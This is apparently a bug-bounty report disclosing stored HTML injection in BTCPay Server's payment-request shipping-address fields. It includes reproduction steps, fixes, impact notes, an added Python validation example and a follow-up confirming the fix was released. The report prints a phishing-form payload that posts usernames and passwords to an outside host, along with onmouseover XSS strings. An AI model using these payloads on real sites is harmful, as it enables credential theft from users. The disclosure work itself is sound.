Stored HTML Injection inside the >>> Request payment >>> Request Customer Data Checkout >>> Request shipping address in btcpayserver/btcpayserver
Reported on
Feb 20th 2023
Team,
I hope you are all doing well.
*. I wanted to bring to your attention a potential vulnerability on the website https://mainnet.demo.btcpayserver.org/stores/6YSiuoN6q1yF2ucWZvWojBuVJAJzXxFFUn9cw8iNPPMC/payment-requests/edit/ec575d56-6b8e-41bd-8b9a-bdcda9c5daad.
*. During my research, I discovered that the five-plus fields are vulnerable to a stored HTML injection attack inside the >>> Request payment >>> Request Customer Data Checkout >>> Request shipping address in https://mainnet.demo.btcpayserver.org/stores/6YSiuoN6q1yF2ucWZvWojBuVJAJzXxFFUn9cw8iNPPMC/payment-requests/edit/ec575d56-6b8e-41bd-8b9a-bdcda9c5daad.
Proof of Concept:
*. I have created a video demonstration of the vulnerability and uploaded it to my Google Drive.
*. The link for the video is provided below for your review:
https://drive.google.com/file/d/1Pn33vZ4TeFovvkK50eVBUGAkeVSfCQf-/view?usp=sharing
Reproduction Steps:
*. Go to the website https://mainnet.demo.btcpayserver.org/stores/6YSiuoN6q1yF2ucWZvWojBuVJAJzXxFFUn9cw8iNPPMC/payment-requests
*. Click payment request.
*. Request new payment.
*. Remember to enable the >>> Request customer data on checkout >>> Request shipping address.
*. Create the payment request.
*. Now click view; we/the user need to enter the address and other stuff.
*. Use the following HTML payload in the below fields:
buyerName
buyerAddress1
buyerAddress2
buyerCity
buyerZip
buyerState
buyerCountry
Payload:
<html><body><head><meta content="text/html; charset=utf-8"></meta></head>
<div style="text-align: center;"><form Method="POST" Action="http://www.test.com/">
Phishingpage :<br /><br/>Username :<br /> <input name="User" /><br />Password :<br />
<input name="Password" type="password" /><br /><br /><input name="Valid" value="Ok !" type="submit" />
<br /></form></div></body></html>
<input><input"/onmouseover="confirm(1);//“onload=onload><input><innerHTML><img src="https://www.petmd.com/sites/default/files/Acute-Dog-Diarrhea-47066074.jpg" width="1000" height="750" alt="onmouseover=prompt(1);//" /></a></input>
*. Save this information.
*. Now, cancel payment and move on to the payment request and click edit data.
*. Check that the request shipping address part was stored and rendered the HTML injection.
*. That's the issue.
*. Tried both HTML/JavaScript injections, but only the HTML injection worked. Due to your content security policy, JS is omitted.
Solution:
*. Restrict special characters and HTML-encode attributes in the input fields.
*. Use regular expressions or other techniques to detect and reject malicious input.
*. Avoid embedding user input into emails unless necessary and always HTML-encode user input before embedding it into emails.
*. Implement proper input validation and sanitization measures to prevent this type of vulnerability from occurring in the future.
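One way to apply the reject-on-input and encode-on-output advice above, as an added Python example that is not BTCPay Server's own code (the field names are the seven the report lists; the sample submission is constructed from the report's payload):

```python
import html
import re

# The seven shipping-address fields named in the report.
SHIPPING_FIELDS = ("buyerName", "buyerAddress1", "buyerAddress2",
                   "buyerCity", "buyerZip", "buyerState", "buyerCountry")

# Any HTML tag or inline event handler; used to reject input outright,
# never to "clean" it, since partial stripping is easy to get wrong.
TAG_OR_HANDLER = re.compile(r"<[^>]*>|\bon[a-z]+\s*=", re.IGNORECASE)

def validate_shipping(form: dict, max_len: int = 200) -> dict:
    """Return {field: reason} for shipping fields that carry markup or are too long."""
    errors = {}
    for field in SHIPPING_FIELDS:
        value = form.get(field, "")
        if len(value) > max_len:
            errors[field] = "too long"
        elif TAG_OR_HANDLER.search(value):
            errors[field] = "markup not allowed"
    return errors

def render_shipping(form: dict) -> str:
    """Render stored values into the 'edit data' view; every value is encoded
    with quote=True so it is inert in both text and attribute context."""
    rows = []
    for field in SHIPPING_FIELDS:
        safe = html.escape(form.get(field, ""), quote=True)
        rows.append(f'<label>{field}: <input name="{field}" value="{safe}"></label>')
    return "\n".join(rows)

def contains_live_markup(rendered: str) -> bool:
    """True if any tag other than the template's own label/input survived."""
    own = re.compile(r'<(label|/label|input name="[A-Za-z0-9]+" value="[^"]*")>')
    return "<" in own.sub("", rendered)

# Constructed sample submission: the report's phishing-form payload in
# buyerName and an attribute-breakout attempt in buyerCity.
SAMPLE_FORM = {
    "buyerName": '<form Method="POST" Action="http://www.test.com/">'
                 '<input name="User" /></form>',
    "buyerCity": '" onmouseover="confirm(1)',
    "buyerZip": "12345",
}

if __name__ == "__main__":
    print(validate_shipping(SAMPLE_FORM))   # rejects buyerName and buyerCity
    print(render_shipping(SAMPLE_FORM))     # encoded, so it renders as plain text
```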
Impact
*. Stored HTML injection with credentials capturing can have serious negative impacts on both individuals and organizations.
*. This type of attack involves injecting malicious code into a website's database, which can then be retrieved and displayed to unsuspecting users. If the injected code captures login credentials, it can allow an attacker to gain unauthorized access to sensitive information or even take control of user accounts.
*. The impact of such an attack can be significant, including financial loss, reputational damage, and legal consequences.
*. For individuals, stored HTML injection with credentials capturing can result in identity theft or the compromise of personal and financial information.
*. For organizations, it can lead to the theft of sensitive data, disruption of services, and loss of customer trust.
*. To prevent this type of attack, it is important for website developers to follow secure coding practices and implement security measures such as input validation and encryption.
*. It is also crucial for users to be vigilant and use strong, unique passwords and to never reuse passwords across multiple accounts.
https://github.com/btcpayserver/btcpayserver/issues/4678
Hi Team,
Hope you are doing well on your end. :)
Upon inspection, it appears that a fix for the HTML injection vulnerability in the payment request forms has been implemented.
And I am pleased to confirm that I am no longer able to reproduce the issue.
I want to express my heartfelt appreciation for your prompt action in fixing the HTML injection vulnerability in our payment request forms. Your quick response and dedication to ensuring the security of our system are truly commendable. Thank you for your hard work and commitment to keeping our system safe and secure.
@maintainer I'm curious about the process for assigning a CVE and what the next steps are regarding the resolution of this issue. Could you provide more information on what needs to be done in order to assign a CVE, and what actions will be taken moving forward to ensure that the vulnerability is fully addressed?
Cheers!
We released yesterday: https://github.com/btcpayserver/btcpayserver/releases/tag/v1.8.0